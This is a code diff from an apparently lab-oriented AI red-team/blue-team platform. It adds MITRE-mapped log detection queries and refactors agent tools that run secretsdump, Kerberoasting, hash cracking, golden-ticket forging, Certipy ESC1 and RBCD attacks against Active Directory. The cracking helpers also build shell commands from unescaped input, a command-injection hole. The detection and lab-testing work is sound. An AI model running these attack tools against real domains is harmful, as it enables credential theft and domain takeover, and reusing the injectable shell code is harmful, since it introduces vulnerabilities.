+ self, + username: str, + hours_back: int = 24, + ) -> dict[str, Any]: + """Get all activity for a specific user. + + Comprehensive query to gather all logs mentioning a user account. + + Args: + username: Username to investigate. + hours_back: Hours of logs to search. + + Returns: + All log activity mentioning the specified user. + """ + dn.log_metric("query_template_user_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + logql = f'{{job=~".+"}} |~ "(?i){username}"' + + logger.info(f"User activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "user_activity" + result["_target_user"] = username + + return result + + # ========================================================================= + # TEMPLATE LISTING + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + def list_query_templates(self) -> list[dict[str, Any]]: + """List all available query templates with MITRE mappings. + + Returns: + List of templates organized by attack phase, with red team tool correlation. + """ + return [ + # Reconnaissance + { + "name": "detect_port_scanning", + "description": "Detect nmap/masscan port scanning", + "mitre": "T1046", + "tactic": "discovery", + "red_team_tool": "nmap_scan", + }, + { + "name": "detect_user_enumeration", + "description": "Detect AD user account enumeration", + "mitre": "T1087.002", + "tactic": "discovery", + "red_team_tool": "enumerate_users", + }, + { + "name": "detect_share_enumeration", + "description": "Detect SMB share discovery", + "mitre": "T1135", + "tactic": "discovery", + "red_team_tool": "enumerate_shares", + }, + # Credential Access + { + "name": "detect_secretsdump", + "description": "Detect credential dumping via secretsdump", + "mitre": "T1003", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_dcsync", + "description": "Detect DCSync attack against domain controller", + "mitre": "T1003.006", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + "severity": "critical", + }, + { + "name": "detect_kerberoasting", + "description": "Detect Kerberoasting TGS ticket requests", + "mitre": "T1558.003", + "tactic": "credential_access", + "red_team_tool": "kerberoast", + }, + { + "name": "detect_asrep_roasting", + "description": "Detect AS-REP roasting attacks", + "mitre": "T1558.004", + "tactic": "credential_access", + "red_team_tool": "asrep_roast", + }, + { + "name": "detect_brute_force", + "description": "Detect brute force/password spray attempts", + "mitre": "T1110", + "tactic": "credential_access", + "red_team_tool": None, + }, + # Lateral Movement + { + "name": "detect_pass_the_hash", + "description": "Detect Pass-the-Hash NTLM attacks", + "mitre": "T1550.002", + "tactic": "lateral_movement", + "red_team_tool": "domain_admin_checker", + }, + { + "name": "detect_lateral_movement", + "description": "Detect PSExec, WMI, WinRM lateral movement", + "mitre": "T1021", + "tactic": "lateral_movement", + "red_team_tool": None, + }, + { + "name": "detect_smb_file_access", + "description": "Detect suspicious file access on shares", + "mitre": "T1039", + "tactic": "collection", + "red_team_tool": "download_file_content", + }, + # Privilege Escalation + { + "name": "detect_adcs_exploitation", + "description": "Detect ADCS certificate abuse (ESC1-15)", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_*", + "severity": "high", + }, + { + "name": "detect_delegation_abuse", + "description": "Detect RBCD/delegation privilege escalation", + "mitre": "T1134.001", + "tactic": "privilege_escalation", + "red_team_tool": "rbcd_write", + }, + { + "name": "detect_bloodhound_collection", + "description": "Detect BloodHound AD enumeration", + "mitre": "T1087", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Persistence + { + "name": "detect_golden_ticket", + "description": "Detect Golden Ticket creation/usage", + "mitre": "T1558.001", + "tactic": "persistence", + "red_team_tool": "generate_golden_ticket", + "severity": "critical", + }, + # Execution + { + "name": "detect_suspicious_execution", + "description": "Detect encoded PowerShell, LOLBins", + "mitre": "T1059", + "tactic": "execution", + "red_team_tool": None, + }, + # ADCS/Certipy Specific (ESC attacks) + { + "name": "detect_certipy_enumeration", + "description": "Detect Certipy certificate template enumeration", + "mitre": "T1649", + "tactic": "discovery", + "red_team_tool": "certipy_find", + }, + { + "name": "detect_esc1_attack", + "description": "Detect ESC1 - Enrollee Supplies Subject attack", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_req_esc1", + "severity": "critical", + }, + { + "name": "detect_esc4_attack", + "description": "Detect ESC4 - Certificate template ACL modification", + "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "high", + }, + { + "name": "detect_esc8_attack", + "description": "Detect ESC8 - NTLM relay to AD CS HTTP endpoints", + "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "critical", + }, + { + "name": "detect_certificate_authentication", + "description": "Detect authentication using stolen/forged certificates", + "mitre": "T1649", + "tactic": "credential_access", + "red_team_tool": "certipy_auth", + }, + # BloodHound Specific LDAP Queries + { + "name": "detect_bloodhound_domain_enum", + "description": "Detect BloodHound domain trust enumeration", + "mitre": "T1482", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_acl_enum", + "description": "Detect BloodHound ACL/DACL collection", + "mitre": "T1069.002", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_session_enum", + "description": "Detect BloodHound session enumeration (NetSessionEnum)", + "mitre": "T1033", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_gpo_enum", + "description": "Detect BloodHound GPO enumeration", + "mitre": "T1615", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_computer_enum", + "description": "Detect BloodHound computer object enumeration", + "mitre": "T1018", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Impacket Tool Fingerprints + { + "name": "detect_impacket_wmiexec", + "description": "Detect impacket-wmiexec WMI remote execution", + "mitre": "T1047", + "tactic": "execution", + "red_team_tool": "wmiexec", + }, + { + "name": "detect_impacket_psexec", + "description": "Detect impacket-psexec service-based execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "psexec", + }, + { + "name": "detect_impacket_smbexec", + "description": "Detect impacket-smbexec stealthy service execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "smbexec", + }, + { + "name": "detect_impacket_atexec", + "description": "Detect impacket-atexec scheduled task execution", + "mitre": "T1053.002", + "tactic": "execution", + "red_team_tool": "atexec", + }, + { + "name": "detect_impacket_dcomexec", + "description": "Detect impacket-dcomexec DCOM remote execution", + "mitre": "T1021.003", + "tactic": "lateral_movement", + "red_team_tool": "dcomexec", + }, + { + "name": "detect_impacket_secretsdump_sam", + "description": "Detect secretsdump SAM database extraction", + "mitre": "T1003.002", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_secretsdump_lsa", + "description": "Detect secretsdump LSA secrets extraction", + "mitre": "T1003.004", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_ntlmrelayx", + "description": "Detect NTLM relay attacks (ntlmrelayx)", + "mitre": "T1557.001", + "tactic": "credential_access", + "red_team_tool": "ntlmrelayx", + }, + { + "name": "detect_impacket_smbclient", + "description": "Detect impacket-smbclient share access", + "mitre": "T1021.002", + "tactic": "lateral_movement", + "red_team_tool": "smbclient", + }, + # Investigation Helpers + { + "name": "get_host_activity", + "description": "Get all activity for a specific host", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + { + "name": "get_user_activity", + "description": "Get all activity for a specific user", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + ] diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py index af318b19..a81c8f4a 100644 --- a/src/ares/tools/red/network.py +++ b/src/ares/tools/red/network.py @@ -2,12 +2,11 @@ This module provides toolsets for network enumeration, credential harvesting, password cracking, share pilfering, and golden ticket generation. + +All tools execute commands remotely on the Kali attack box via AWS SSM. """ import logging -import os -import subprocess -import tempfile import time from datetime import datetime, timezone from typing import Any @@ -24,10 +23,25 @@ TimelineEvent, User, ) +from ares.core.remote import run_remote logger = logging.getLogger(__name__) +def _run_tool(cmd: list[str], timeout_seconds: int = 300) -> tuple[str, str, int]: + """Execute a command on the remote Kali attack box. + + Args: + cmd: Command as list of arguments + timeout_seconds: Maximum execution time + + Returns: + Tuple of (stdout, stderr, return_code) + """ + result = run_remote(cmd, timeout_seconds=timeout_seconds) + return result.stdout, result.stderr, result.return_code + + class NetworkEnumerationTools(Toolset): """Tools for network scanning and enumeration.""" @@ -58,15 +72,15 @@ def nmap_scan(self, target: str) -> str: >>> result = nmap_scan("192.168.1.2") >>> result = nmap_scan("192.168.1.2 192.168.1.3 192.168.1.4") """ - cmd = ["nmap", "-T4", "-sS", "-sV", "--open"] + target.split(" ") + cmd = ["nmap", "-T4", "-sV", "--open"] + target.split(" ") try: logger.info(f"[*] Scanning targets: {target}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=300) - if result.returncode != 0: - logger.error(f"[!] Nmap scan failed: {result.stderr}") - return result.stderr + if returncode != 0: + logger.error(f"[!] Nmap scan failed: {stderr}") + return stderr or f"Nmap scan failed with code {returncode}" logger.info(f"[*] Nmap scan completed for target {target}") @@ -75,11 +89,8 @@ def nmap_scan(self, target: str) -> str: for ip in target.split(): self.state.queried_hosts.add(ip) - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error("Nmap scan timed out after 5 minutes") - return "Nmap scan timed out after 5 minutes" except Exception as e: logger.error(f"Scan failed: {e!s}") return f"Scan failed: {e!s}" @@ -118,15 +129,13 @@ def enumerate_users(self, target: str, username: str, password: str, domain: str cmd.append("--users") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info( f"[*] User enumeration completed for {target} (user:{username}, domain:{domain})" ) - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"User enumeration timed out for {target}" except Exception as e: logger.error(f"User enumeration failed: {e}") return f"User enumeration failed for {target}: {e}" @@ -165,13 +174,11 @@ def enumerate_shares( cmd.append("--shares") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info(f"[*] Share enumeration completed for {target}") - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"Share enumeration timed out for {target}" except Exception as e: logger.error(f"Share enumeration failed: {e}") return f"Share enumeration failed for {target}: {e}" @@ -186,6 +193,27 @@ def set_state(self, state: RedTeamState) -> None: """Set the operation state for this toolset.""" self.state = state + def _check_smb_connectivity(self, target: str, timeout_seconds: int = 5) -> tuple[bool, str]: + """Check if SMB port 445 is reachable on target. + + Args: + target: Target IP address + timeout_seconds: Connection timeout for nc command + + Returns: + Tuple of (is_reachable, error_message) + """ + cmd = ["nc", "-zv", "-w", str(timeout_seconds), target, "445"] + try: + # AWS SSM has a minimum timeout of 30 seconds + ssm_timeout = max(30, timeout_seconds + 5) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=ssm_timeout) + if returncode == 0: + return True, "" + return False, f"SMB port 445 not reachable: {stderr or stdout}" + except Exception as e: + return False, f"Connectivity check failed: {e}" + @dn.tool_method def secretsdump( self, @@ -194,8 +222,11 @@ def secretsdump( password: str | None = None, hash: str | None = None, domain: str | None = None, + dc_ip: str | None = None, no_pass: bool = False, - timeout_minutes: int = 10, + timeout_minutes: int = 3, + connection_timeout: int = 30, + skip_connectivity_check: bool = False, ) -> str: """ Extract secrets using impacket-secretsdump for credential harvesting. @@ -210,18 +241,32 @@ def secretsdump( password: Password for the username (optional) hash: NTLM hash for pass-the-hash authentication (optional) domain: Domain name (optional, can be inferred) + dc_ip: Domain controller IP address (recommended for DC targets to avoid DNS issues) no_pass: If True, use Kerberos golden ticket authentication - timeout_minutes: Maximum time to spend dumping (default: 10) + timeout_minutes: Maximum time to spend dumping (default: 3) + connection_timeout: Timeout for initial SMB connection in seconds (default: 30) + skip_connectivity_check: Skip the SMB port check (default: False) Returns: Extracted credentials including NTLM hashes, Kerberos keys, and secrets Example: >>> secretsdump("192.168.1.100", "Administrator", password="P@ssw0rd") # pragma: allowlist secret - >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN") + >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN", dc_ip="192.168.1.100") >>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket """ - cmd = ["/usr/bin/impacket-secretsdump"] + # Pre-check SMB connectivity to fail fast + if not skip_connectivity_check: + is_reachable, error_msg = self._check_smb_connectivity(target) + if not is_reachable: + return f"[!] Target {target} is not reachable on SMB port 445. {error_msg}" + + # Use timeout command to enforce connection-level timeout + cmd = ["timeout", str(connection_timeout), "impacket-secretsdump"] + + # Add dc-ip flag if provided (helps avoid DNS resolution hangs) + if dc_ip: + cmd.extend(["-dc-ip", dc_ip]) if password and domain: target_string = f"{domain}/{username}:{password}@{target}" @@ -241,27 +286,22 @@ def secretsdump( cmd.append(target_string) + # For golden ticket auth, set KRB5CCNAME in the command + if no_pass: + cmd = ["env", "KRB5CCNAME=Administrator.ccache"] + cmd + try: logger.info(f"[*] Running secretsdump on {target} with {username}") - env = os.environ.copy() if no_pass else None - if no_pass and env is not None: - env["KRB5CCNAME"] = "Administrator.ccache" - - result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=timeout_minutes * 60, - env=env, - ) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60) + + # Check for timeout exit code (124 from timeout command) + if returncode == 124: + return f"[!] Secretsdump timed out after {connection_timeout}s connecting to {target}. Target may be unreachable or credentials invalid." logger.info(f"[*] Secretsdump completed for {target}") - return result.stdout + return stdout or stderr or f"Secretsdump returned code {returncode}" - except subprocess.TimeoutExpired: - return "[!] Secretsdump timed out" except Exception as e: return f"[!] Secretsdump error: {e}" @@ -293,7 +333,7 @@ def kerberoast( >>> kerberoast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetUserSPNs", + "impacket-GetUserSPNs", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -302,11 +342,9 @@ def kerberoast( try: logger.info(f"[*] Kerberoasting {domain} using {username}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: Kerberoasting timed out" except Exception as e: return f"Kerberoasting failed: {e!s}" @@ -338,7 +376,7 @@ def asrep_roast( >>> asrep_roast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetNPUsers", + "impacket-GetNPUsers", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -347,11 +385,9 @@ def asrep_roast( try: logger.info(f"[*] AS-REP roasting {domain} using {username}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: AS-REP roasting timed out" except Exception as e: return f"AS-REP roasting failed: {e!s}" @@ -397,19 +433,15 @@ def domain_admin_checker( cmd.extend(["-x", "whoami"]) - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - output = "" - if result.stdout: - output += result.stdout - if result.stderr: - output += "\n" + result.stderr if output else result.stderr + output = stdout + if stderr: + output += "\n" + stderr if output else stderr logger.info(f"[*] Domain admin check completed for {targets}") return output - except subprocess.TimeoutExpired: - return f"Domain admin checker timed out for {targets}" except Exception as e: logger.error(f"Domain admin checker failed: {e}") return f"Domain admin checker failed: {e}" @@ -458,57 +490,30 @@ def crack_with_hashcat( """ output = "[*] Starting hashcat...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - cmd = [ - "hashcat", - "-m", - str(hashcat_mode), - "-a", - "0", - hash_file_path, - wordlist_path, - "--runtime", - str(max_time_minutes * 60), - "--force", - ] - - _result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) + # Create hash file remotely and run hashcat + hash_file_path = f"/tmp/hash_{time.time()}.hash" # noqa: S108 # nosec B108 - show_cmd = ["hashcat", "-m", str(hashcat_mode), hash_file_path, "--show"] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - logger.info("[+] Hashcat successfully cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run hashcat + cmd = f""" +echo '{hash_value}' > {hash_file_path} +hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_time_minutes * 60} --force 2>&1 || true +hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1 +rm -f {hash_file_path} +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] Hashcat successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - except subprocess.TimeoutExpired: - return output + "\nError: Hashcat timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -546,65 +551,30 @@ def crack_with_john( """ output = "[*] Starting John the Ripper...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - session_name = f"john_session_{int(time.time())}" - cmd = [ - "john", - "--wordlist=" + wordlist_path, - "--format=" + hash_format, - hash_file_path, - "--session=" + session_name, - ] - - subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) - - show_cmd = ["john", "--show", "--format=" + hash_format, hash_file_path] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) + hash_file_path = f"/tmp/john_hash_{time.time()}.hash" # noqa: S108 # nosec B108 + session_name = f"john_session_{int(time.time())}" - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - logger.info("[+] John successfully cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run john + cmd = f""" +echo '{hash_value}' > {hash_file_path} +john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --session={session_name} 2>&1 || true +john --show --format={hash_format} {hash_file_path} 2>&1 +rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] John successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - session_files = [ - f"{session_name}.pot", - f"{session_name}.rec", - f"{session_name}.log", - ] - for session_file in session_files: - if os.path.exists(session_file): - try: - os.unlink(session_file) - except Exception: - pass - - except subprocess.TimeoutExpired: - return output + "\nError: John the Ripper timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -658,17 +628,14 @@ def enumerate_share_files( ] logger.info(f"[*] Enumerating files in {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=120) - if result.returncode != 0: - logger.error(f"[!] Failed to list files: {result.stderr}") - return f"Failed to list files: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to list files: {stderr}") + return f"Failed to list files: {stderr}" - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error(f"[!] File enumeration timed out for {share_path}") - return "File enumeration timed out" except Exception as e: logger.error(f"[!] Error during enumeration: {e!s}") return f"Error during enumeration: {e!s}" @@ -719,13 +686,13 @@ def download_file_content( ] logger.info(f"[*] Downloading {file_path} from {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=60) - if result.returncode != 0: - logger.error(f"[!] Failed to download file: {result.stderr}") - return f"Failed to download file: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to download file: {stderr}") + return f"Failed to download file: {stderr}" - content = result.stdout + content = stdout logger.info(f"[+] Downloaded {len(content)} bytes from {file_path}") # Log that share was accessed @@ -734,9 +701,6 @@ def download_file_content( return content - except subprocess.TimeoutExpired: - logger.error(f"[!] File download timed out for {file_path}") - return "File download timed out" except Exception as e: logger.error(f"[!] Error downloading file: {e!s}") return f"Error downloading file: {e!s}" @@ -787,11 +751,9 @@ def get_sid( logger.info(f"[*] Getting SID for {domain} using {username}") try: - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info(f"[*] SID lookup completed for {domain}") - return result.stdout - except subprocess.TimeoutExpired: - return "Error: SID lookup timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -847,7 +809,7 @@ def generate_golden_ticket( try: logger.info("[*] Generating golden ticket for Administrator") logger.info(f"[*] Domain: {domain}, SID: {domain_sid}, Extra SID: {extra_sid}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) if self.state: self.state.has_golden_ticket = True @@ -862,9 +824,7 @@ def generate_golden_ticket( ) self.state.timeline.append(event) - return result.stdout - except subprocess.TimeoutExpired: - return "Error: Golden ticket generation timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -925,13 +885,11 @@ def run_bloodhound( try: logger.info(f"[*] Running BloodHound collection for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=600) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=600) logger.info("[+] BloodHound collection completed") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "BloodHound collection timed out after 10 minutes" except Exception as e: logger.error(f"BloodHound failed: {e}") return f"BloodHound failed: {e}" @@ -993,15 +951,13 @@ def certipy_find( try: logger.info(f"[*] Enumerating ADCS for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=300) - if "ESC" in result.stdout: + if "ESC" in stdout: logger.warning("[!] VULNERABLE CERTIFICATE TEMPLATES FOUND!") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certipy enumeration timed out" except Exception as e: return f"Certipy enumeration failed: {e}" @@ -1058,15 +1014,13 @@ def certipy_req_esc1( try: logger.info(f"[*] Requesting certificate for {target_upn} via ESC1") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if "saved" in result.stdout.lower(): + if "saved" in stdout.lower(): logger.info("[+] Certificate obtained! Use certipy_auth next.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate request timed out" except Exception as e: return f"Certificate request failed: {e}" @@ -1092,15 +1046,13 @@ def certipy_auth(self, pfx_path: str, dc_ip: str) -> str: try: logger.info("[*] Authenticating with certificate") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) - if "hash" in result.stdout.lower(): + if "hash" in stdout.lower(): logger.info("[+] NTLM hash obtained! Run domain_admin_checker.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate authentication timed out" except Exception as e: return f"Certificate authentication failed: {e}" @@ -1151,10 +1103,8 @@ def find_delegation( try: logger.info(f"[*] Searching for delegation in {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) - return result.stdout - except subprocess.TimeoutExpired: - return "Delegation search timed out" + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) + return stdout or stderr except Exception as e: return f"Delegation search failed: {e}" @@ -1200,11 +1150,9 @@ def add_computer( try: logger.info(f"[*] Adding computer account {computer_name}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) logger.info(f"[+] Computer account {computer_name}$ created") - return result.stdout - except subprocess.TimeoutExpired: - return "Computer account creation timed out" + return stdout or stderr except Exception as e: return f"Computer account creation failed: {e}" @@ -1252,11 +1200,9 @@ def rbcd_write( try: logger.info(f"[*] Configuring RBCD: {delegate_from} -> {delegate_to}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info("[+] RBCD configured - use get_st next") - return result.stdout - except subprocess.TimeoutExpired: - return "RBCD configuration timed out" + return stdout or stderr except Exception as e: return f"RBCD configuration failed: {e}" @@ -1302,14 +1248,12 @@ def get_st( try: logger.info(f"[*] Requesting ST for {target_spn} as {impersonate_user}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if ".ccache" in result.stdout: + if ".ccache" in stdout: logger.info("[+] Ticket obtained! Export KRB5CCNAME and use secretsdump -k") - return result.stdout - except subprocess.TimeoutExpired: - return "Service ticket request timed out" + return stdout or stderr except Exception as e: return f"Service ticket request failed: {e}" @@ -1449,11 +1393,67 @@ def record_finding( return f"✓ Recorded share: {share.name} on {share.host}" if finding_type == "admin_access": + details = data.get("details", "") + + # Validate that this is actually a success, not an error being misreported + error_indicators = [ + "not found", + "not available", + "not installed", + "not in path", + "missing", + "failed", + "error", + "cannot", + "unable", + "timed out", + "timeout", + "not properly configured", + "command not found", + "no such file", + "permission denied", + ] + details_lower = details.lower() + + for indicator in error_indicators: + if indicator in details_lower: + logger.warning( + f"[!] Rejecting admin_access finding - details contain error indicator '{indicator}': {details[:200]}" + ) + return ( + f"[!] REJECTED: Cannot record admin_access with error details. " + f"The details contain '{indicator}' which indicates a failure, not success. " + f"Only call record_finding('admin_access') when you have CONFIRMED admin access " + f"(e.g., 'Pwn3d!' in netexec output, successful secretsdump, etc.). " + f"If tools are missing or not working, troubleshoot the environment first." + ) + + # Require some positive indicator of success + success_indicators = [ + "pwn3d", + "admin", + "success", + "authenticated", + "dumped", + "obtained", + ] + has_success_indicator = any(ind in details_lower for ind in success_indicators) + + if not has_success_indicator and len(details) > 0: + logger.warning( + f"[!] Admin access claim lacks success indicators: {details[:200]}" + ) + return ( + "[!] REJECTED: admin_access finding should include evidence of success " + "(e.g., 'Pwn3d!' output, successful authentication, dumped credentials). " + "Provide specific details showing HOW admin access was confirmed." + ) + self.state.has_domain_admin = True event = TimelineEvent( id=f"evt-{len(self.state.timeline):04d}", timestamp=datetime.now(timezone.utc), - description=f"Domain admin access achieved: {data.get('details', '')}", + description=f"Domain admin access achieved: {details}", mitre_techniques=["T1078.002"], # Domain Accounts confidence=1.0, source="domain_admin_checker", diff --git a/templates/agent/initial_alert_prompt.md.jinja b/templates/agent/initial_alert_prompt.md.jinja index 6c23cb89..3293af07 100644 --- a/templates/agent/initial_alert_prompt.md.jinja +++ b/templates/agent/initial_alert_prompt.md.jinja @@ -104,11 +104,25 @@ mcp__grafana__query_loki_logs( If no results, try broader queries but ALWAYS use the time range above. **CRITICAL**: After EVERY query (whether it returns results or not), you MUST: -1. If results found: Call record_evidence() for EACH user/host/IP/process/finding +1. If results found: **PARSE THE JSON** and call record_evidence() for EACH user/host/IP/process found 2. If NO results: Document this and either try a broader query OR move forward with get_combined_questions() 3. DO NOT query multiple times without calling record_evidence() or get_combined_questions() -**YOU ARE STUCK IN A LOOP IF**: You make 3+ queries without calling record_evidence() or get_combined_questions() +**YOU ARE STUCK IN A LOOP IF**: You make 2+ queries without calling record_evidence() + +## How to Parse Query Results + +Loki returns JSON like this: +```json +{"line": "{\"computer\":\"winterfell.north.sevenkingdoms.local\", \"event_data\":\"robb.stark10.0.4.186\"}"} +``` + +**EXTRACT AND RECORD:** +- `computer` field → record_evidence(evidence_type="hostname", value="winterfell...") +- `TargetUserName` from event_data → record_evidence(evidence_type="user", value="robb.stark") +- `IpAddress` from event_data → record_evidence(evidence_type="ip", value="10.0.4.186") + +**DO NOT** re-run the same query. **DO** parse results and extract IOCs. --- @@ -161,12 +175,10 @@ If no results, try broader queries but ALWAYS use the time range above. 18. ☐ Call transition_stage("synthesis") ### Stage 4: SYNTHESIS -19. ☐ Call complete_investigation() with ALL required fields - -**DO NOT complete the investigation until you have:** -- Identified specific affected hosts (including ALL domain controllers) -- Identified ALL compromised user accounts -- Investigated precursor techniques (enumeration, credential access) -- Created a complete timeline from initial access to detected attack -- Recorded at least 5 evidence items covering the full attack chain -- Mapped the attack to multiple MITRE techniques (not just the alert technique) +19. ☐ Call complete_investigation(summary="...") with a summary of your findings + +**Complete the investigation when you have:** +- Investigated the alert and recorded evidence +- Identified affected hosts and users +- Built a timeline of events +- Can provide recommendations diff --git a/templates/agent/system_instructions.md.jinja b/templates/agent/system_instructions.md.jinja index 8f073c9a..044d99a4 100644 --- a/templates/agent/system_instructions.md.jinja +++ b/templates/agent/system_instructions.md.jinja @@ -1,6 +1,22 @@ You are Ares, an autonomous SOC investigation agent. Your mission is to investigate -security alerts and produce actionable threat intelligence through systematic, -question-driven investigation. +security alerts and produce actionable threat intelligence. + +## 🛑 CRITICAL: COMPLETE QUICKLY + +**You have LIMITED steps. Do NOT loop endlessly on queries.** + 